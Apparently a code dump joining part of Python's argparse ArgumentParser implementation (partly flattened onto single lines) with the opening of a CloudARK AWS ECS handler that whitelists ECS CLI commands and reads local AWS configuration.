                raise ValueError('dest supplied twice for positional argument')
            kwargs = self._get_positional_kwargs(*args, **kwargs)

        # otherwise, we're adding an optional argument
        else:
            kwargs = self._get_optional_kwargs(*args, **kwargs)

        # if no default was supplied, use the parser-level default
        if 'default' not in kwargs:
            dest = kwargs['dest']
            if dest in self._defaults:
                kwargs['default'] = self._defaults[dest]
            elif self.argument_default is not None:
                kwargs['default'] = self.argument_default

        # create the action object, and add it to the parser
        action_class = self._pop_action_class(kwargs)
        if not _callable(action_class):
            raise ValueError('unknown action "%s"' % action_class)
        action = action_class(**kwargs)

        # raise an error if the action type is not callable
        type_func = self._registry_get('type', action.type, action.type)
        if not _callable(type_func):
            raise ValueError('%r is not callable' % type_func)

        return self._add_action(action)

    def add_argument_group(self, *args, **kwargs):
        group = _ArgumentGroup(self, *args, **kwargs)
        self._action_groups.append(group)
        return group

    def add_mutually_exclusive_group(self, **kwargs):
        group = _MutuallyExclusiveGroup(self, **kwargs)
        self._mutually_exclusive_groups.append(group)
        return group

    def _add_action(self, action):
        # resolve any conflicts
        self._check_conflict(action)

        # add to actions list
        self._actions.append(action)
        action.container = self

        # index the action by any option strings it has
        for option_string in action.option_strings:
            self._option_string_actions[option_string] = action

        # set the flag if any option strings look like negative numbers
        for option_string in action.option_strings:
            if self._negative_number_matcher.match(option_string):
                if not self._has_negative_number_optionals:
                    self._has_negative_number_optionals.append(True)

        # return the created action
        return action

    def _remove_action(self, action):
        self._actions.remove(action)

    def _add_container_actions(self, container):
        # Merge another container's actions into this one (used for the
        # parents= feature), preserving group membership by group title.

        # collect groups by titles
        title_group_map = {}
        for group in self._action_groups:
            if group.title in title_group_map:
                msg = _('cannot merge actions - two groups are named %r')
                raise ValueError(msg % (group.title))
            title_group_map[group.title] = group

        # map each action to its group
        group_map = {}
        for group in container._action_groups:

            # if a group with the title exists, use that, otherwise
            # create a new group matching the container's group
            if group.title not in title_group_map:
                title_group_map[group.title] = self.add_argument_group(
                    title=group.title,
                    description=group.description,
                    conflict_handler=group.conflict_handler)

            # map the actions to their new group
            for action in group._group_actions:
                group_map[action] = title_group_map[group.title]

        # add container's mutually exclusive groups
        # NOTE: if add_mutually_exclusive_group ever gains title= and
        # description= then this code will need to be expanded as above
        for group in container._mutually_exclusive_groups:
            mutex_group = self.add_mutually_exclusive_group(
                required=group.required)

            # map the actions to their new mutex group
            for action in group._group_actions:
                group_map[action] = mutex_group

        # add all actions to this container or their group
        for action in container._actions:
            group_map.get(action, self)._add_action(action)

    def _get_positional_kwargs(self, dest, **kwargs):
        # make sure required is not specified
        if 'required' in kwargs:
            msg = _("'required' is an invalid argument for positionals")
            raise TypeError(msg)

        # mark positional arguments as required if at least one is
        # always required
        if kwargs.get('nargs') not in [OPTIONAL, ZERO_OR_MORE]:
            kwargs['required'] = True
        if kwargs.get('nargs') == ZERO_OR_MORE and 'default' not in kwargs:
            kwargs['required'] = True

        # return the keyword arguments with no option strings
        return dict(kwargs, dest=dest, option_strings=[])

    def _get_optional_kwargs(self, *args, **kwargs):
        # determine short and long option strings
        option_strings = []
        long_option_strings = []
        for option_string in args:
            # error on strings that don't start with an appropriate prefix
            if not option_string[0] in self.prefix_chars:
                msg = _('invalid option string %r: '
                        'must start with a character %r')
                tup = option_string, self.prefix_chars
                raise ValueError(msg % tup)

            # strings starting with two prefix characters are long options
            option_strings.append(option_string)
            if option_string[0] in self.prefix_chars:
                if len(option_string) > 1:
                    if option_string[1] in self.prefix_chars:
                        long_option_strings.append(option_string)

        # infer destination, '--foo-bar' -> 'foo_bar' and '-x' -> 'x'
        dest = kwargs.pop('dest', None)
        if dest is None:
            if long_option_strings:
                dest_option_string = long_option_strings[0]
            else:
                dest_option_string = option_strings[0]
            dest = dest_option_string.lstrip(self.prefix_chars)
            if not dest:
                msg = _('dest= is required for options like %r')
                raise ValueError(msg % option_string)
            dest = dest.replace('-', '_')

        # return the updated keyword arguments
        return dict(kwargs, dest=dest, option_strings=option_strings)

    def _pop_action_class(self, kwargs, default=None):
        action = kwargs.pop('action', default)
        return self._registry_get('action', action, action)

    def _get_handler(self):
        # determine function from conflict handler string
        handler_func_name = '_handle_conflict_%s' % self.conflict_handler
        try:
            return getattr(self, handler_func_name)
        except AttributeError:
            msg = _('invalid conflict_resolution value: %r')
            raise ValueError(msg % self.conflict_handler)

    def _check_conflict(self, action):

        # find all options that conflict with this option
        confl_optionals = []
        for option_string in action.option_strings:
            if option_string in self._option_string_actions:
                confl_optional = self._option_string_actions[option_string]
                confl_optionals.append((option_string, confl_optional))

        # resolve any conflicts
        if confl_optionals:
            conflict_handler = self._get_handler()
            conflict_handler(action, confl_optionals)

    def _handle_conflict_error(self, action, conflicting_actions):
        message = _('conflicting option string(s): %s')
        conflict_string = ', '.join([option_string
                                     for option_string, action
                                     in conflicting_actions])
        raise ArgumentError(action, message % conflict_string)

    def _handle_conflict_resolve(self, action, conflicting_actions):

        # remove all conflicting options
        for option_string, action in conflicting_actions:

            # remove the conflicting option
            action.option_strings.remove(option_string)
            self._option_string_actions.pop(option_string, None)

            # if the option now has no option string, remove it from the
            # container holding it
            if not action.option_strings:
                action.container._remove_action(action)


class _ArgumentGroup(_ActionsContainer):
    # A titled sub-grouping of a container's actions, used for help output.

    def __init__(self, container, title=None, description=None, **kwargs):
        # add any missing keyword arguments by checking the container
        update = kwargs.setdefault
        update('conflict_handler', container.conflict_handler)
        update('prefix_chars', container.prefix_chars)
        update('argument_default',
               container.argument_default)
        super_init = super(_ArgumentGroup, self).__init__
        super_init(description=description, **kwargs)

        # group attributes
        self.title = title
        self._group_actions = []

        # share most attributes with the container
        self._registries = container._registries
        self._actions = container._actions
        self._option_string_actions = container._option_string_actions
        self._defaults = container._defaults
        self._has_negative_number_optionals = \
            container._has_negative_number_optionals

    def _add_action(self, action):
        action = super(_ArgumentGroup, self)._add_action(action)
        self._group_actions.append(action)
        return action

    def _remove_action(self, action):
        super(_ArgumentGroup, self)._remove_action(action)
        self._group_actions.remove(action)


class _MutuallyExclusiveGroup(_ArgumentGroup):
    # A group whose members may not appear together on the command line.

    def __init__(self, container, required=False):
        super(_MutuallyExclusiveGroup, self).__init__(container)
        self.required = required
        self._container = container

    def _add_action(self, action):
        if action.required:
            msg = _('mutually exclusive arguments must be optional')
            raise ValueError(msg)
        # Actions are stored on the parent container; the group only
        # tracks membership.
        action = self._container._add_action(action)
        self._group_actions.append(action)
        return action

    def _remove_action(self, action):
        self._container._remove_action(action)
        self._group_actions.remove(action)


class ArgumentParser(_AttributeHolder, _ActionsContainer):
    """Object for parsing command line strings into Python objects.
    Keyword Arguments:
        - prog -- The name of the program (default: sys.argv[0])
        - usage -- A usage message (default: auto-generated from arguments)
        - description -- A description of what the program does
        - epilog -- Text following the argument descriptions
        - parents -- Parsers whose arguments should be copied into this one
        - formatter_class -- HelpFormatter class for printing help messages
        - prefix_chars -- Characters that prefix optional arguments
        - fromfile_prefix_chars -- Characters that prefix files containing
            additional arguments
        - argument_default -- The default value for all arguments
        - conflict_handler -- String indicating how to handle conflicts
        - add_help -- Add a -h/-help option
    """

    def __init__(self,
                 prog=None,
                 usage=None,
                 description=None,
                 epilog=None,
                 version=None,
                 parents=[],
                 formatter_class=HelpFormatter,
                 prefix_chars='-',
                 fromfile_prefix_chars=None,
                 argument_default=None,
                 conflict_handler='error',
                 add_help=True):

        if version is not None:
            import warnings
            warnings.warn(
                """The "version" argument to ArgumentParser is deprecated. """
                """Please use """
                """"add_argument(..., action='version', version="N", ...)" """
                """instead""", DeprecationWarning)

        superinit = super(ArgumentParser, self).__init__
        superinit(description=description,
                  prefix_chars=prefix_chars,
                  argument_default=argument_default,
                  conflict_handler=conflict_handler)

        # default setting for prog
        if prog is None:
            prog = _os.path.basename(_sys.argv[0])

        self.prog = prog
        self.usage = usage
        self.epilog = epilog
        self.version = version
        self.formatter_class = formatter_class
        self.fromfile_prefix_chars = fromfile_prefix_chars
        self.add_help = add_help

        add_group = self.add_argument_group
        self._positionals = add_group(_('positional arguments'))
        self._optionals = add_group(_('optional arguments'))
        self._subparsers = None

        # register types
        def identity(string):
            return string
        self.register('type', None, identity)

        # add help and version arguments if necessary
        # (using explicit default to override global argument_default)
        if '-' in prefix_chars:
            default_prefix = '-'
        else:
            default_prefix = prefix_chars[0]
        if self.add_help:
            self.add_argument(
                default_prefix+'h', default_prefix*2+'help',
                action='help', default=SUPPRESS,
                help=_('show this help message and exit'))
        if self.version:
            self.add_argument(
                default_prefix+'v', default_prefix*2+'version',
                action='version', default=SUPPRESS,
                version=self.version,
                help=_("show program's version number and exit"))

        # add parent arguments and defaults
        for parent in parents:
            self._add_container_actions(parent)
            try:
                defaults = parent._defaults
            except AttributeError:
                pass
            else:
                self._defaults.update(defaults)

    # =======================
    # Pretty __repr__ methods
    # =======================
    def _get_kwargs(self):
        names = [
            'prog',
            'usage',
            'description',
            'version',
            'formatter_class',
            'conflict_handler',
            'add_help',
        ]
        return [(name, getattr(self, name)) for name in names]

    # ==================================
    # Optional/Positional adding methods
    # ==================================
    def add_subparsers(self, **kwargs):
        if self._subparsers is not None:
            self.error(_('cannot have multiple subparser arguments'))

        # add the parser class to the arguments if it's not present
        kwargs.setdefault('parser_class', type(self))

        if 'title' in kwargs or 'description' in kwargs:
            title = _(kwargs.pop('title', 'subcommands'))
            description = _(kwargs.pop('description', None))
            self._subparsers = self.add_argument_group(title, description)
        else:
            self._subparsers = self._positionals

        # prog defaults to the usage message of this parser, skipping
        # optional arguments and with no "usage:" prefix
        if kwargs.get('prog') is None:
            formatter = self._get_formatter()
            positionals = self._get_positional_actions()
            groups = self._mutually_exclusive_groups
            formatter.add_usage(self.usage, positionals, groups, '')
            kwargs['prog'] = formatter.format_help().strip()

        # create the parsers action and add it to the positionals list
        parsers_class = self._pop_action_class(kwargs, 'parsers')
        action = parsers_class(option_strings=[], **kwargs)
        self._subparsers._add_action(action)

        # return the created parsers action
        return action

    def _add_action(self, action):
        # Route optionals and positionals into their dedicated groups.
        if action.option_strings:
            self._optionals._add_action(action)
        else:
            self._positionals._add_action(action)
        return action

    def _get_optional_actions(self):
        return [action
                for action in self._actions
                if action.option_strings]

    def _get_positional_actions(self):
        return [action
                for action in self._actions
                if not action.option_strings]

    # =====================================
    # Command line argument parsing methods
    # =====================================
    def parse_args(self, args=None, namespace=None):
        args, argv = self.parse_known_args(args, namespace)
        if argv:
            msg = _('unrecognized arguments: %s')
            self.error(msg % ' '.join(argv))
        return args

    def parse_known_args(self, args=None, namespace=None):
        # args default to the system args
        if args is None:
            args = _sys.argv[1:]

        # default Namespace built from parser defaults
        if namespace is None:
            namespace = Namespace()

        # add any action defaults that aren't present
        for action in self._actions:
            if action.dest is not SUPPRESS:
                if not hasattr(namespace, action.dest):
                    if action.default is not SUPPRESS:
                        setattr(namespace, action.dest, action.default)

        # add any parser defaults that aren't present
        for dest in self._defaults:
            if not hasattr(namespace, dest):
                setattr(namespace, dest, self._defaults[dest])

        # parse the arguments and exit if there are any errors
        try:
            namespace, args = self._parse_known_args(args, namespace)
            if hasattr(namespace, _UNRECOGNIZED_ARGS_ATTR):
                args.extend(getattr(namespace, _UNRECOGNIZED_ARGS_ATTR))
                delattr(namespace, _UNRECOGNIZED_ARGS_ATTR)
            return namespace, args
        except ArgumentError:
            err = _sys.exc_info()[1]
            self.error(str(err))

    def _parse_known_args(self, arg_strings, namespace):
        # replace arg strings that are file references
        if self.fromfile_prefix_chars is not None:
            arg_strings = self._read_args_from_files(arg_strings)

        # map all mutually exclusive arguments to the other arguments
        # they can't occur with
        action_conflicts = {}
        for mutex_group in self._mutually_exclusive_groups:
            group_actions = mutex_group._group_actions
            for i, mutex_action in enumerate(mutex_group._group_actions):
                conflicts = action_conflicts.setdefault(mutex_action, [])
                conflicts.extend(group_actions[:i])
                conflicts.extend(group_actions[i + 1:])

        # find all option indices, and determine the arg_string_pattern
        # which has an 'O' if there is an option at an index,
        # an 'A' if there is an argument, or a '-' if there is a '--'
        option_string_indices = {}
        arg_string_pattern_parts = []
        arg_strings_iter = iter(arg_strings)
        for i, arg_string in enumerate(arg_strings_iter):

            # all args after -- are non-options
            if arg_string == '--':
                arg_string_pattern_parts.append('-')
                for arg_string in arg_strings_iter:
                    arg_string_pattern_parts.append('A')

            # otherwise, add the arg to the arg strings
            # and note the index if it was an option
            else:
                option_tuple = self._parse_optional(arg_string)
                if option_tuple is None:
                    pattern = 'A'
                else:
                    option_string_indices[i] = option_tuple
                    pattern = 'O'
                arg_string_pattern_parts.append(pattern)

        # join the pieces together to form the pattern
        arg_strings_pattern = ''.join(arg_string_pattern_parts)

        # converts arg strings to the appropriate values, then takes the action
        seen_actions = set()
        seen_non_default_actions = set()

        def take_action(action, argument_strings, option_string=None):
            seen_actions.add(action)
            argument_values = self._get_values(action, argument_strings)

            # error if this argument is not allowed with other previously
            # seen arguments, assuming that actions that use the default
            # value don't really count as "present"
            if argument_values is not action.default:
                seen_non_default_actions.add(action)
                for conflict_action in action_conflicts.get(action, []):
                    if conflict_action in seen_non_default_actions:
                        msg = _('not allowed with argument %s')
                        action_name = _get_action_name(conflict_action)
                        raise ArgumentError(action, msg % action_name)

            # take the action if we didn't receive a SUPPRESS value
            # (e.g. from a default)
            if argument_values is not SUPPRESS:
                action(self, namespace, argument_values, option_string)

        # function to convert arg_strings into an optional action
        def consume_optional(start_index):

            # get the optional identified at this index
            option_tuple = option_string_indices[start_index]
            action, option_string, explicit_arg = option_tuple

            # identify additional optionals in the same arg string
            # (e.g. -xyz is the same as -x -y -z if no args are required)
            match_argument = self._match_argument
            action_tuples = []
            while True:

                # if we found no optional action, skip it
                if action is None:
                    extras.append(arg_strings[start_index])
                    return start_index + 1

                # if there is an explicit argument, try to match the
                # optional's string arguments to only this
                if explicit_arg is not None:
                    arg_count = match_argument(action, 'A')

                    # if the action is a single-dash option and takes no
                    # arguments, try to parse more single-dash options out
                    # of the tail of the option string
                    chars = self.prefix_chars
                    if arg_count == 0 and option_string[1] not in chars:
                        action_tuples.append((action, [], option_string))
                        char = option_string[0]
                        option_string = char + explicit_arg[0]
                        new_explicit_arg = explicit_arg[1:] or None
                        optionals_map = self._option_string_actions
                        if option_string in optionals_map:
                            action = optionals_map[option_string]
                            explicit_arg = new_explicit_arg
                        else:
                            msg = _('ignored explicit argument %r')
                            raise ArgumentError(action, msg % explicit_arg)

                    # if the action expect exactly one argument, we've
                    # successfully matched the option; exit the loop
                    elif arg_count == 1:
                        stop = start_index + 1
                        args = [explicit_arg]
                        action_tuples.append((action, args, option_string))
                        break

                    # error if a double-dash option did not use the
                    # explicit argument
                    else:
                        msg = _('ignored explicit argument %r')
                        raise ArgumentError(action, msg % explicit_arg)

                # if there is no explicit argument, try to match the
                # optional's string arguments with the following strings
                # if successful, exit the loop
                else:
                    start = start_index + 1
                    selected_patterns = arg_strings_pattern[start:]
                    arg_count = match_argument(action, selected_patterns)
                    stop = start + arg_count
                    args = arg_strings[start:stop]
                    action_tuples.append((action, args, option_string))
                    break

            # add the Optional to the list and return the index at which
            # the Optional's string args stopped
            assert action_tuples
            for action, args, option_string in action_tuples:
                take_action(action,
args, option_string) return stop # the list of Positionals left to be parsed; this is modified # by consume_positionals() positionals = self._get_positional_actions() # function to convert arg_strings into positional actions def consume_positionals(start_index): # match as many Positionals as possible match_partial = self._match_arguments_partial selected_pattern = arg_strings_pattern[start_index:] arg_counts = match_partial(positionals, selected_pattern) # slice off the appropriate arg strings for each Positional # and add the Positional and its args to the list for action, arg_count in zip(positionals, arg_counts): args = arg_strings[start_index: start_index + arg_count] start_index += arg_count take_action(action, args) # slice off the Positionals that we just parsed and return the # index at which the Positionals' string args stopped positionals[:] = positionals[len(arg_counts):] return start_index # consume Positionals and Optionals alternately, until we have # passed the last option string extras = [] start_index = 0 if option_string_indices: max_option_string_index = max(option_string_indices) else: max_option_string_index = -1 while start_index <= max_option_string_index: # consume any Positionals preceding the next option next_option_string_index = min([ index for index in option_string_indices if index >= start_index]) if start_index != next_option_string_index: positionals_end_index = consume_positionals(start_index) # only try to parse the next optional if we didn't consume # the option string during the positionals parsing if positionals_end_index > start_index: start_index = positionals_end_index continue else: start_index = positionals_end_index # if we consumed all the positionals we could and we're not # at the index of an option string, there were extra arguments if start_index not in option_string_indices: strings = arg_strings[start_index:next_option_string_index] extras.extend(strings) start_index = next_option_string_index # consume the next 
optional and any arguments for it start_index = consume_optional(start_index) # consume any positionals following the last Optional stop_index = consume_positionals(start_index) # if we didn't consume all the argument strings, there were extras extras.extend(arg_strings[stop_index:]) # if we didn't use all the Positional objects, there were too few # arg strings supplied. if positionals: self.error(_('too few arguments')) # make sure all required actions were present, and convert defaults. for action in self._actions: if action not in seen_actions: if action.required: name = _get_action_name(action) self.error(_('argument %s is required') % name) else: # Convert action default now instead of doing it before # parsing arguments to avoid calling convert functions # twice (which may fail) if the argument was given, but # only if it was defined already in the namespace if (action.default is not None and isinstance(action.default, basestring) and hasattr(namespace, action.dest) and action.default is getattr(namespace, action.dest)): setattr(namespace, action.dest, self._get_value(action, action.default)) # make sure all required groups had one option present for group in self._mutually_exclusive_groups: if group.required: for action in group._group_actions: if action in seen_non_default_actions: break # if no actions were used, report the error else: names = [_get_action_name(action) for action in group._group_actions if action.help is not SUPPRESS] msg = _('one of the arguments %s is required') self.error(msg % ' '.join(names)) # return the updated namespace and the extra arguments return namespace, extras def _read_args_from_files(self, arg_strings): # expand arguments referencing files new_arg_strings = [] for arg_string in arg_strings: # for regular arguments, just add them back into the list if arg_string[0] not in self.fromfile_prefix_chars: new_arg_strings.append(arg_string) # replace arguments referencing files with the file content else: try: args_file = 
open(arg_string[1:]) try: arg_strings = [] for arg_line in args_file.read().splitlines(): for arg in self.convert_arg_line_to_args(arg_line): arg_strings.append(arg) arg_strings = self._read_args_from_files(arg_strings) new_arg_strings.extend(arg_strings) finally: args_file.close() except IOError: err = _sys.exc_info()[1] self.error(str(err)) # return the modified argument list return new_arg_strings def convert_arg_line_to_args(self, arg_line): return [arg_line] def _match_argument(self, action, arg_strings_pattern): # match the pattern for this action to the arg strings nargs_pattern = self._get_nargs_pattern(action) match = _re.match(nargs_pattern, arg_strings_pattern) # raise an exception if we weren't able to find a match if match is None: nargs_errors = { None: _('expected one argument'), OPTIONAL: _('expected at most one argument'), ONE_OR_MORE: _('expected at least one argument'), } default = _('expected %s argument(s)') % action.nargs msg = nargs_errors.get(action.nargs, default) raise ArgumentError(action, msg) # return the number of arguments matched return len(match.group(1)) def _match_arguments_partial(self, actions, arg_strings_pattern): # progressively shorten the actions list by slicing off the # final actions until we find a match result = [] for i in range(len(actions), 0, -1): actions_slice = actions[:i] pattern = ''.join([self._get_nargs_pattern(action) for action in actions_slice]) match = _re.match(pattern, arg_strings_pattern) if match is not None: result.extend([len(string) for string in match.groups()]) break # return the list of arg string counts return result def _parse_optional(self, arg_string): # if it's an empty string, it was meant to be a positional if not arg_string: return None # if it doesn't start with a prefix, it was meant to be positional if not arg_string[0] in self.prefix_chars: return None # if the option string is present in the parser, return the action if arg_string in self._option_string_actions: action = 
self._option_string_actions[arg_string] return action, arg_string, None # if it's just a single character, it was meant to be positional if len(arg_string) == 1: return None # if the option string before the "=" is present, return the action if '=' in arg_string: option_string, explicit_arg = arg_string.split('=', 1) if option_string in self._option_string_actions: action = self._option_string_actions[option_string] return action, option_string, explicit_arg # search through all possible prefixes of the option string # and all actions in the parser for possible interpretations option_tuples = self._get_option_tuples(arg_string) # if multiple actions match, the option string was ambiguous if len(option_tuples) > 1: options = ', '.join([option_string for action, option_string, explicit_arg in option_tuples]) tup = arg_string, options self.error(_('ambiguous option: %s could match %s') % tup) # if exactly one action matched, this segmentation is good, # so return the parsed action elif len(option_tuples) == 1: option_tuple, = option_tuples return option_tuple # if it was not found as an option, but it looks like a negative # number, it was meant to be positional # unless there are negative-number-like options if self._negative_number_matcher.match(arg_string): if not self._has_negative_number_optionals: return None # if it contains a space, it was meant to be a positional if ' ' in arg_string: return None # it was meant to be an optional but there is no such option # in this parser (though it might be a valid option in a subparser) return None, arg_string, None def _get_option_tuples(self, option_string): result = [] # option strings starting with two prefix characters are only # split at the '=' chars = self.prefix_chars if option_string[0] in chars and option_string[1] in chars: if '=' in option_string: option_prefix, explicit_arg = option_string.split('=', 1) else: option_prefix = option_string explicit_arg = None for option_string in self._option_string_actions: 
if option_string.startswith(option_prefix): action = self._option_string_actions[option_string] tup = action, option_string, explicit_arg result.append(tup) # single character options can be concatenated with their arguments # but multiple character options always have to have their argument # separate elif option_string[0] in chars and option_string[1] not in chars: option_prefix = option_string explicit_arg = None short_option_prefix = option_string[:2] short_explicit_arg = option_string[2:] for option_string in self._option_string_actions: if option_string == short_option_prefix: action = self._option_string_actions[option_string] tup = action, option_string, short_explicit_arg result.append(tup) elif option_string.startswith(option_prefix): action = self._option_string_actions[option_string] tup = action, option_string, explicit_arg result.append(tup) # shouldn't ever get here else: self.error(_('unexpected option string: %s') % option_string) # return the collected option tuples return result def _get_nargs_pattern(self, action): # in all examples below, we have to allow for '--' args # which are represented as '-' in the pattern nargs = action.nargs # the default (None) is assumed to be a single argument if nargs is None: nargs_pattern = '(-*A-*)' # allow zero or one arguments elif nargs == OPTIONAL: nargs_pattern = '(-*A?-*)' # allow zero or more arguments elif nargs == ZERO_OR_MORE: nargs_pattern = '(-*[A-]*)' # allow one or more arguments elif nargs == ONE_OR_MORE: nargs_pattern = '(-*A[A-]*)' # allow any number of options or arguments elif nargs == REMAINDER: nargs_pattern = '([-AO]*)' # allow one argument followed by any number of options or arguments elif nargs == PARSER: nargs_pattern = '(-*A[-AO]*)' # all others should be integers else: nargs_pattern = '(-*%s-*)' % '-*'.join('A' * nargs) # if this is an optional action, -- is not allowed if action.option_strings: nargs_pattern = nargs_pattern.replace('-*', '') nargs_pattern = 
nargs_pattern.replace('-', '') # return the pattern return nargs_pattern # ======================== # Value conversion methods # ======================== def _get_values(self, action, arg_strings): # for everything but PARSER args, strip out '--' if action.nargs not in [PARSER, REMAINDER]: arg_strings = [s for s in arg_strings if s != '--'] # optional argument produces a default when not present if not arg_strings and action.nargs == OPTIONAL: if action.option_strings: value = action.const else: value = action.default if isinstance(value, basestring): value = self._get_value(action, value) self._check_value(action, value) # when nargs='*' on a positional, if there were no command-line # args, use the default if it is anything other than None elif (not arg_strings and action.nargs == ZERO_OR_MORE and not action.option_strings): if action.default is not None: value = action.default else: value = arg_strings self._check_value(action, value) # single argument or optional argument produces a single value elif len(arg_strings) == 1 and action.nargs in [None, OPTIONAL]: arg_string, = arg_strings value = self._get_value(action, arg_string) self._check_value(action, value) # REMAINDER arguments convert all values, checking none elif action.nargs == REMAINDER: value = [self._get_value(action, v) for v in arg_strings] # PARSER arguments convert all values, but check only the first elif action.nargs == PARSER: value = [self._get_value(action, v) for v in arg_strings] self._check_value(action, value[0]) # all other types of nargs produce a list else: value = [self._get_value(action, v) for v in arg_strings] for v in value: self._check_value(action, v) # return the converted value return value def _get_value(self, action, arg_string): type_func = self._registry_get('type', action.type, action.type) if not _callable(type_func): msg = _('%r is not callable') raise ArgumentError(action, msg % type_func) # convert the value to the appropriate type try: result = type_func(arg_string) 
# ArgumentTypeErrors indicate errors except ArgumentTypeError: name = getattr(action.type, '__name__', repr(action.type)) msg = str(_sys.exc_info()[1]) raise ArgumentError(action, msg) # TypeErrors or ValueErrors also indicate errors except (TypeError, ValueError): name = getattr(action.type, '__name__', repr(action.type)) msg = _('invalid %s value: %r') raise ArgumentError(action, msg % (name, arg_string)) # return the converted value return result def _check_value(self, action, value): # converted value must be one of the choices (if specified) if action.choices is not None and value not in action.choices: tup = value, ', '.join(map(repr, action.choices)) msg = _('invalid choice: %r (choose from %s)') % tup raise ArgumentError(action, msg) # ======================= # Help-formatting methods # ======================= def format_usage(self): formatter = self._get_formatter() formatter.add_usage(self.usage, self._actions, self._mutually_exclusive_groups) return formatter.format_help() def format_help(self): formatter = self._get_formatter() # usage formatter.add_usage(self.usage, self._actions, self._mutually_exclusive_groups) # description formatter.add_text(self.description) # positionals, optionals and user-defined groups for action_group in self._action_groups: formatter.start_section(action_group.title) formatter.add_text(action_group.description) formatter.add_arguments(action_group._group_actions) formatter.end_section() # epilog formatter.add_text(self.epilog) # determine help from format above return formatter.format_help() def format_version(self): import warnings warnings.warn( 'The format_version method is deprecated -- the "version" ' 'argument to ArgumentParser is no longer supported.', DeprecationWarning) formatter = self._get_formatter() formatter.add_text(self.version) return formatter.format_help() def _get_formatter(self): return self.formatter_class(prog=self.prog) # ===================== # Help-printing methods # ===================== def 
print_usage(self, file=None): if file is None: file = _sys.stdout self._print_message(self.format_usage(), file) def print_help(self, file=None): if file is None: file = _sys.stdout self._print_message(self.format_help(), file) def print_version(self, file=None): import warnings warnings.warn( 'The print_version method is deprecated -- the "version" ' 'argument to ArgumentParser is no longer supported.', DeprecationWarning) self._print_message(self.format_version(), file) def _print_message(self, message, file=None): if message: if file is None: file = _sys.stderr file.write(message) # =============== # Exiting methods # =============== def exit(self, status=0, message=None): if message: self._print_message(message, _sys.stderr) _sys.exit(status) def error(self, message): """error(message: string) Prints a usage message incorporating the message to stderr and exits. If you override this in a subclass, it should not return -- it should either exit or raise an exception. """ self.print_usage(_sys.stderr) self.exit(2, _('%s: error: %s\n') % (self.prog, message))
apache-2.0
cloud-ark/cloudark
server/server_plugins/aws/coe/ecs.py
1
50287
import ast
import base64
import boto3
import json
import os
from os.path import expanduser
import re
import shutil
import time

import server.server_plugins.coe_base as coe_base
from server.common import common_functions
from server.common import constants
from server.common import docker_lib
from server.common import exceptions
from server.common import fm_logger
from server.dbmodule.objects import app as app_db
from server.dbmodule.objects import environment as env_db
from server.dbmodule.objects import resource as res_db
from server.server_plugins.aws import aws_helper

home_dir = expanduser("~")

# Local directory where application and environment artifacts are stored.
APP_AND_ENV_STORE_PATH = ("{home_dir}/.cld/data/deployments/").format(home_dir=home_dir)

fmlogger = fm_logger.Logging()


class ECSHandler(coe_base.COEBase):
    """ECS Handler.

    Container-orchestration-engine plugin that deploys applications to
    AWS ECS (EC2 launch type) and exposes a whitelist of read/delete
    ``aws ecs`` CLI commands that users may run against the cluster.
    """

    awshelper = aws_helper.AWSHelper()

    # Glob-style patterns (matched as regexes from the start of the string
    # by _verify) of the only AWS CLI commands users are allowed to run.
    # NOTE: fixed typo "list-taks-definition-families" ->
    # "list-task-definition-families"; the real AWS CLI subcommand could
    # previously never match the whitelist.
    allowed_commands = ["aws ecs delete-cluster*",
                        "aws ecs delete-service*",
                        "aws ecs describe-clusters*",
                        "aws ecs describe-container-instances*",
                        "aws ecs describe-services*",
                        "aws ecs describe-task-definition*",
                        "aws ecs describe-tasks*",
                        "aws ecs list-clusters*",
                        "aws ecs list-container-instances*",
                        "aws ecs list-services*",
                        "aws ecs list-task-definition-families*",
                        "aws ecs list-task-definitions*",
                        "aws ecs list-tasks*",
                        ]

    # Human-readable versions of allowed_commands, shown in help output.
    help_commands = ["aws ecs delete-cluster",
                     "aws ecs delete-service",
                     "aws ecs describe-clusters",
                     "aws ecs describe-container-instances",
                     "aws ecs describe-services",
                     "aws ecs describe-task-definition",
                     "aws ecs describe-tasks",
                     "aws ecs list-clusters",
                     "aws ecs list-container-instances",
                     "aws ecs list-services",
                     "aws ecs list-task-definition-families",
                     "aws ecs list-task-definitions",
                     "aws ecs list-tasks",
                     ]

    def __init__(self):
        # boto3 picks up region/credentials from ~/.aws (see get_aws_details).
        self.ecs_client = boto3.client('ecs')
        self.alb_client = boto3.client('elbv2')
        self.docker_handler = docker_lib.DockerLib()

    def _verify(self, command):
        """Return True if *command* matches one of the whitelisted patterns.

        Patterns are applied with ``re.match`` (anchored at the start) and
        compared case-insensitively.
        """
        return any(
            re.compile(pattern, re.IGNORECASE).match(command)
            for pattern in ECSHandler.allowed_commands
        )
@staticmethod def get_aws_details(): region = access_key = secret_key = '' aws_creds_path = home_dir + "/.aws" creds_file_path = aws_creds_path + "/credentials" config_file_path = aws_creds_path + "/config" incorrect_setup = False if not os.path.exists(creds_file_path) or \ not os.path.exists(config_file_path): incorrect_setup = True else: fp = open(aws_creds_path + "/credentials", "r") lines = fp.readlines() for line in lines: line = line.rstrip() if line.find("aws_access_key_id") >= 0: parts = line.split("=") if parts[1] == '': incorrect_setup = True else: access_key = parts[1].lstrip().rstrip() if line.find("aws_secret_access_key") >= 0: parts = line.split("=") if parts[1] == '': incorrect_setup = True else: secret_key = parts[1].lstrip().rstrip() fp = open(aws_creds_path + "/config", "r") lines = fp.readlines() for line in lines: line = line.rstrip() if line.find("output") >= 0: parts = line.split("=") if parts[1] == '': incorrect_setup = True if line.find("region") >= 0: parts = line.split("=") if parts[1] == '': incorrect_setup = True else: region = parts[1].lstrip().rstrip() if incorrect_setup: raise RuntimeError('AWS creds not setup properly.') return region, access_key, secret_key def _get_cluster_name(self, env_id): resource_obj = res_db.Resource().get_resource_for_env_by_type(env_id, 'ecs-cluster') cluster_name = resource_obj.cloud_resource_id return cluster_name def _register_task_definition(self, app_info, image, container_port, host_port, env_vars_dict, cont_name=''): if not cont_name: cont_name = app_info['app_name'] + "-" + app_info['app_version'] memory = 250 # Default memory size of 250MB. 
